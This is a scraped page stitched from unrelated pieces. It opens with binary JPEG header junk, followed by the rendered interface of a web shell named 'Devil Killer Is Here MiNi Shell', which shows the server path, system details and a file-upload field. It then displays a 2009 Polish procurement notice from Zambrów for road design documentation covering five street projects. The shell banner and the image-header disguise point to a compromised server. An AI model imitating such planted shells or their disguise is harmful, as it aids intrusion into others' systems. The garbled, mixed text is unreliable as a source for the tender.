JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/76035-N-2009.html

<p class="kh_header"><b>Zambrów: Dokumentacja projektowa</b><br>
<b>Numer ogłoszenia: 76035 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Zambrów , ul. Fabryczna 3, 18-300 Zambrów, woj. podlaskie, tel. 0862712210 w. 16, faks 086 2712117.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zambrow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja projektowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi w zakresie opracowania dokumentacji projektowo-kosztorysowej zadań: budowy ulicy Wiśniowej, Pogodnej i Ogrodowej oraz przebudowy ulicy Mickiewicza  i remontu drogi wewnętrznej do Szkoły Podstawowej  nr 3 w Zambrowie.

Do obowiązków wykonawcy należy uzyskanie i przygotowanie wtórnika aktualnej mapy geodezyjnej .

W zakres opracowań objętych przedmiotem zamówienia wchodzą:
1. Projekty  budowlano-wykonawcze                                     5 egz.
2. Zatwierdzony projekt organizacji ruchu na czas budowy   5 egz.
3.  Zatwierdzony projekt stałej organizacji ruchu                   5 egz.
4. Informacja    BIOZ                                                              5egz..
5 Specyfikacje techniczne wykonania i odbioru robót          2 egz.
6. Przedmiary robót                                                                2 egz.
7. Kosztorysy inwestorskie.                                                    2 egz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawjający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy spełniający warunki określone w punktach niniejszej specyfikacji istotnych warunków zamówienia, którzy złożą wymagane oświadczenia i dokumenty.

O udzielenie zamówienia ubiegać się mogą wykonawcy  spełniający warunki określone w art.22 ust.1 pkt.1-4 oraz nie podlegający wykluczeniu na podstawie art.24 ust.1 i 2 ustawy z dnia 29.01.2004r Prawo zamówień publicznych ( Dz.U. z 2007r. Nr223,poz.1655 z późniejszymi zmianami), tj:
1)  posiadają uprawnienia do wykonywania  działalności lub czynności , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.:
a)	wykażą,  że  w  okresie  ostatnich  trzech   lat  przed  dniem   wszczęcia postępowania o udzielenie   zamówienia , a  jeśli  okres  prowadzenia  działalności  jest  krótszy  -  w tym    okresie,  wykonali należycie min.2 usługi projektowe, odpowiadające swoim rodzajem i wartością usługom , stanowiącym przedmiot zamówienia, z podaniem ich miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały należycie wykonane,
b)	wykażą, że dysponują  lub będą   dysponować  osobą posiadającą uprawnienia budowlane w specjalności drogowej bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych przepisów, należące do właściwej Izby Inżynierów Budownictwa, -zapewniająca wykonanie również opracowań branżowych wynikających z zakresu prac zamówienia publicznego,
3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia .
4)   nie  podlegają   wykluczeniu z  postępowania  o udzielenie  zamówienia    na podst.art.24 ust.1 i 2   
    ustawy.

Oceny spełnienia ww. warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność złożonych dokumentów wymienionych w Rozd.3 pkt.I SIWZ  metodą spełnia-nie spełnia.( art.26 ust.3 i 4 ustawy pzp).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności składa następujące dokumenty:
   1)Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu ( oświadczenie zawarto w formularzu ofertowym - załącznik nr 2) - w celu potwierdzenia, że Wykonawca spełnia wymagania wynikające z art.22 ust.1 pkt.1-4 ustawy Prawo zamówień publicznych;
    2) Aktualny  odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w celu potwierdzenia spełnienia opisanego warunku w rozdz. 2 pkt.VI ppkt.1.

2.   W celu potwierdzenia , że Wykonawca posiada niezbędna wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, składa następujące dokumenty:
1)	 Wykaz wykonanych ( zakończonych) usług projektowych( załącznik nr3) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania - w celu potwierdzenia spełnienia opisanego warunku w rozdz.2 pkt.VI ppkt.2 lit. a)
2)	 Dokumenty potwierdzające, że usługi projektowe z załącznika nr 3 zostały wykonane należycie np.referencje  - w celu potwierdzenia spełnienia warunku opisanego rozdz.2 pkt.VI ppkt.2lit.a)
3)	 Wskazanie osoby ( załącznik nr 4) którą dysponuje lub będzie dysponował Wykonawca , wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia - celu potwierdzenia spełnienia opisanego warunku  w rozdz.2 pkt.VI  ppkt.2 lit.b,) 
4)	 Pisemne zobowiązanie innych podmiotów do udostępnienia osoby   do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 3) wykonawca wskazał osobę, którą będzie dysponował.

3. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podst.art. 24 ustawy z dnia 29 stycznia 2004r składa dokumenty:
   1)  Aktualne zaświadczenie od właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert -  w celu potwierdzenia opisanego warunku w rozdz.2 pkt.VI ppkt. 4 ;
   2)  Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub  Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - w celu potwierdzenia opisanego warunku w rozdz.2.pkt.VI  ppkt.4;

4. Informacja dla wykonawców w przypadku składania oferty przez spółkę cywilną:  
      1) wykonawca     zobowiązany           jest    złożyć: umowę spółki, z której wynikać będzie sposób 
      reprezentowania spółki, a także pełnomocnictwo do zaciągania w jej imieniu zobowiązań.

5.  Informacja dla Wykonawców, którzy będą wspólnie ubiegać się o udzielenie zamówienia.
Wykonawcy mogą wspólnie ubiegać się o udział w postępowaniu, w takim przypadku winni spełniać następujące wymagania:
    1)  ustanowić    pełnomocnika    (lidera) do reprezentowania ich w   postępowaniu o udzielenie 
        niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy o udzielenie 
        przedmiotowego zamówienia publicznego. Umocowanie musi wynikać z pełnomocnictwa. Treść 
        pełnomocnictwa  powinna dokładnie określać  zakres umocowania.
    2) uznaje się, że wymogi dotyczące  potencjału   ekonomicznego, finansowego ,  technicznego, 
       doświadczenia zawodowego oraz posiadania pracowników zdolnych do wykonania zamówienia  
       są spełnione przez konsorcjum jeżeli spełniają je łącznie   wykonawcy występujący w      
       konsorcjum. 
    3)  oświadczenie o spełnianiu warunków udziału w postępowaniu, określone w art.22 ust.1 upzp, 
       składa każdy z podmiotów występujących wspólnie.
       każdy z Wykonawców wchodzących w skład konsorcjum oddzielnie musi udokumentować, że 
       nie podlega wykluczeniu na podst.art.24 ust.1 pkt.1-9 ustawy Prawo zamówień publicznych,  
    4)  wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem wiodącym 
       - liderem.  Płatności będą  wnoszone na  konto bankowe,  którego dysponentem z upoważnienia 
       uczestników będzie podmiot wiodący- lider konsorcjum. 
       W przypadku   wyboru oferty  Wykonawców  występujących  wspólnie   Zamawiający     przed 
       podpisaniem  umowy  będzie  żądał  Umowy  regulującej  współpracę podmiotów występujących 
       wspólnie, która zawierała będzie zobowiązanie tych podmiotów do solidarnej odpowiedzialności      
       z tytułu nie wykonania lub nienależytego wykonania zamówienia publicznego oraz wniesienia 
       zabezpieczenia należytego wykonania umowy.
       w przypadku składania oferty przez Wykonawców występujących wspólnie, podać należy w 
       druku oferty jak również w innych dokumentach  w miejscu  np. nazwa i adres wykonawcy ,
       pełne nazwy firm i adresy wszystkich Wykonawców  występujących wspólnie - z zaznaczeniem 
       lidera.   

6.  Informacja   dla Wykonawców,   którzy  mają  siedzibę  lub miejsce zamieszkania poza terytorium  Rzeczpospolitej Polskiej
    1)  Jeżeli Wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej  
       Polskiej  zamiast dokumentów, dokumentów  których   mowa w pkt.I.1.ppkt.2,  pkt.I.3 ppkt.1,2, 
       składa  dokument  lub dokumenty,   wystawione   w kraju,  w  którym  ma  siedzibę  lub  miejsce 
       zamieszkania, potwierdzające odpowiedni, że:
       a)   nie otwarto jego likwidacji ani nie ogłoszono upadłości,
                    b)   nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub 
                          zdrowotne   albo  że   uzyskał   przewidziane   prawem     zwolnienie,  odroczenie  lub 
                          rozłożenie na  raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji    
                          właściwego organu,
                    c)   nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
  
     2) Dokumenty, o których mowa w  powyższej      informacji    ppkt.1a, 1c oraz ppkt.2 powinny być 
        wystawione nie wcześniej niż 6 m-cy   przed   upływem    terminu   składania ofert, a dokumenty 
        wymienione   w  ppkt.1b)  powinny   być    wystawione  nie   wcześniej   niż  3  miesiące   przed  
        upływem  terminu składania ofert.
    3)  Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 
        zamieszkania, nie wydaje się dokumentów, o których mowa  w powyższej informacji ppkt.1 oraz 
        ppkt.2       zastępuje    się    je   dokumentem     zawierającym      oświadczenie    złożone    przed      
        notariuszem,   właściwym    organem  sądowym, administracyjnym  albo    organem  samorządu   
        zawodowego  lub   gospodarczego  odpowiednio    kraju     pochodzenia  osoby     lub  kraju,  w 
        którym Wykonawca ma siedzibę lub miejsce zamieszkania z datą wystawienia.
    4)  Dokument  lub   dokumenty   składa  się w  formie  oryginału  lub kopii poświadczonej   przez 
        uprawnionego przedstawiciela Wykonawcy za zgodność z oryginałem.
    5)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, 
        poświadczonym za zgodność z oryginałem. przez uprawnionego przedstawiciela Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://um.zambrow.bip-gov.info.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Zambrów ul.Fabryczna 3 pok.nr216.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 11:00, miejsce: Sekretariat Urzędu Miasta Zambrów ul.Fabryczna 3 pok.nr     225.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Opracowanie dokumentacji projektowo-kosztorysowej budowy ulicy Wiśniowej z kanalizacją deszczową i oświetleniem dróg wewnętrznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje :
1.    Opracowania przedprojektowe:
1)	Dokumentacja do uzyskania decyzji o środowiskowych uwarunkowaniach opracowana na  podst.art.71 ust.2 ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, ( Dz. U. Nr 199, poz.1227) - łącznie z  Karta informacyjną o planowanej inwestycji , 
2)	Dokumentacja do wystąpienia wnioskiem opinie do wniosku o zezwolenie na realizację inwestycji drogowej zgodnie z ustawą z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych ( Dz.U z 2003r Nr80, poz.721 z póżn.zm.) - nie dotyczy drogi wewnętrznej,
3)	Dokumentacja do uzyskania decyzji o warunkach zabudowy -Ustawa z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym ( Dz.U Nr.80 poz.717 z późn.zm.). - dotyczy drogi wewnętrznej działka oznaczona nr 1069/9.
2. Opracowania projektowe:
1)	Przygotowanie wniosku do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej w szczególności: ustalenie projektowanego przebiegu pasa drogowego, poprzez określenie linii rozgraniczających  drogi, bez opracowania projektu podziału, ( projekt podziału  zostanie  dokonany przez  Zamawiającego) opracowanie analizy powiązania drogi z innymi drogami publicznymi.
2)	Opracowanie projektu budowy  ulicy  Wiśniowej na odcinku od pasa drogowego GDDKiA      ul.Białostocka  do ulicy Łanowej oraz dróg wewnętrznych .
3)	W opracowywanej dokumentacji  projektowo-kosztorysowej   należy   wydzielić odrębne opracowania:
-	projekt       drogi     wewnętrznej  -  długość   ok.     80 mb ( dz.nr1069/9)  -  w     celu 
             uzyskania  pozwolenia na budowę,
-	projekt ulicy Wiśniowej   -   długość ogółem ok. 560 mb.- w celu uzyskania zgody na 
            realizację inwestycji drogowej
4)	Wykonawca zobowiązany jest przed rozpoczęciem prac projektowych, do uzgodnień z Zamawiającym  proponowanych rozwiązań projektowych.
5)	Projekt budowlany drogowy winien zawierać wszystkie branże niezbędne do wykonania inwestycji tj. oświetlenie, kanalizację deszczową uwzględnić przebieg istniejącego uzbrojenia oraz projekt   k.s. wykonany przez Zambrowskie Ciepłownictwo i Wodociągi.
 
załącznik nr 1   -  kopia mapy zasadniczej  projektowanego terenu
załącznik nr 2  - kopia mapy ewidencyjnej
załącznik nr3-   mapka z zakresem opracowania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> : Zadanie 2 -  Opracowanie dokumentacji projektowo-kosztorysowej ulicy Pogodnej wraz z oświetleniem, kanalizacją deszczową i sanitarną  - zgodnie z miejscowym planem zagospodarowania przestrzennego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje :
1.    Opracowania przedprojektowe:
1)	 Dokumentacja do uzyskania decyzji o środowiskowych uwarunkowaniach opracowana na  podst.art.71 ust.2 ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, ( Dz. U. Nr 199, poz.1227)  łącznie z  Karta informacyjną o planowanej inwestycji 
2) Dokumentacja do wystąpienia wnioskiem opinię do  wniosku o zezwolenie na realizację inwestycji drogowej zgodnie z ustawą z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych ( Dz.U z 2003r Nr80, poz.721 z póżn.zm.) 

2.  Opracowania projektowe :
1) Przygotowanie wniosku do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej w szczególności: ustalenie projektowanego przebiegu pasa drogowego, poprzez określenie linii rozgraniczjacych, bez opracowania projektu podziału działek, ( projekt podziału zostanie  dokonany przez  Zamawiającego) opracowanie analizy powiązania drogi z innymi drogami publicznymi.
2) Opracowanie projektu budowy ulicy Pogodnej wraz z k.s, k.d. i oświetleniem, zgodnie z     miejscowym planem zagospodarowania  przestrzennego - symbole w planie : 02KD ulica  i  04 KD- sięgacz dojazdowy  -
3) Długość projektowanej   ulicy ok. 160 mb,          proj.sięgacza dojazdowego   ok.50 mb.
4) Projekt budowlany winien zawierać wszystkie branże niezbędne do wykonania inwestycji.
5) Wykonawca zobowiązany jest przed rozpoczęciem prac projektowych, do uzgodnień z Zamawiającym proponowanych rozwiązań projektowych.
załącznik nr 4  -część opisowa i graficzna planu.
załącznik nr 5 - kopia mapy zasadniczej
załącznik nr 6 - kopia mapy ewidencyjnej
załącznik nr 7- mapka z zakresem opracowania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 -  Opracowanie dokumentacji projektowo-kosztorysowej ulicy Ogrodowej wraz z  przebudową istniejącego oświetleniem i budową kanalizacji deszczowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Opracowania przedprojektowe:
1)	Sporządzenie analizy, w nawiązaniu do § 7 ust.2 Rozporządzenia Ministra i Gospodarki Morskiej z dnia 2 marca 1999r.w sprawie warunków technicznych, jakim powinny odpowiadać drogi  
2)	Określenie linii rozgraniczających projektowanej drogi, jako wytycznych do podziału , bez sporządzenia projektu podziału działek.
3)	Dokumentacji do uzyskania decyzji o środowiskowych uwarunkowaniach opracowanej na  podst.art.71 ust.2 ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, ( Dz. U. Nr 199, poz.1227)  łącznie z  Kartą informacyjną o planowanej inwestycji. 
4)	 Dokumentacji do wystąpienia wnioskiem opinię do wniosku  o zezwolenie na realizację inwestycji drogowej zgodnie z ustawą z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych ( Dz.U z 2003r Nr80, poz.721 z póżn.zm.) 

2.    Opracowania projektowe:
      1) Przygotowanie wniosku do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej w szczególności: ustalenie projektowanego przebiegu pasa drogowego koniecznego  do dokonania podziału działek dla projektowanego pasa drogowego, opracowanie analizy powiązania drogi z innymi drogami publicznymi.
2)  Opracowanie projektu budowy odcinka ulicy Ogrodowej od ulicy Lipowej na długości. ok.400mb. 
3)  W przypadku wystąpienia kolizji z istn.oświetleniem , należy opracować projekt przebudowy linii.
4)  Poszerzenie pasa drogowego należy przewidzieć w stronę zabudowy jednorodzinnej.
5) Projekt budowlany winien zawierać wszystkie branże niezbędne do wykonania inwestycji.
6) Wykonawca zobowiązany jest przed rozpoczęciem prac projektowych do uzgodnień z Zamawiającym, proponowanych rozwiązań projektowych.

załącznik nr 8 -  kopia mapy zasadniczej  projektowanego terenu.
załącznik nr 9 - kopia mapy ewidencyjnej
załćznik nr 10- mapka z zakresem opracowania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 -  Opracowanie dokumentacji projektowo-kosztorysowej Remontu nawierzchni ulicy Mickiewicza -na podstawie miejscowego planu zagospodarowania przestrzennego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:
1)  Opracowanie projektu Remontu nawierzchni  ulicy,  na podstawie miejscowego planu zagospodarowania, ulica oznaczona w planie symbolem 03KD o dł. ok.140 mb. -projektu dostosowanego do złożenia wniosku zgłoszenia  zamiaru wykonania robót budowlanych nie wymagających uzyskania pozwolenia.
2) Wykonawca zobowiązany jest przed rozpoczęciem prac projektowych do dokonania uzgodnień z Zamawiającym, proponowanych rozwiązań projektowych.

załącznik nr 11-   cz.opisowa i graficzna planu miejscowego,
załącznik nr 12 -  kopia mapy zasadniczej  projektowanego terenu,
załącznik nr 13 - mapka z zakresem opracowania,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 -Opracowanie dokumentacji projektowo-kosztorysowej Remontu drogi wewnętrznej   z przebudową nawierzchni na odcinku do wjazdu na teren Szkoły Podstawowej nr 3 w Zambrowie..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:
1) Opracowania projektu Remontu  drogi wewnętrznej o dł.ok.250 mb. (w tym przebudowy nawierzchni ( utwardzenie) na dł.ok.40m do wjazdu na teren SPnr3 - projekt dostosowany  do złożenia zgłoszenia zamiaru wykonania robót budowlanych nie wymagających uzyskania pozwolenia.
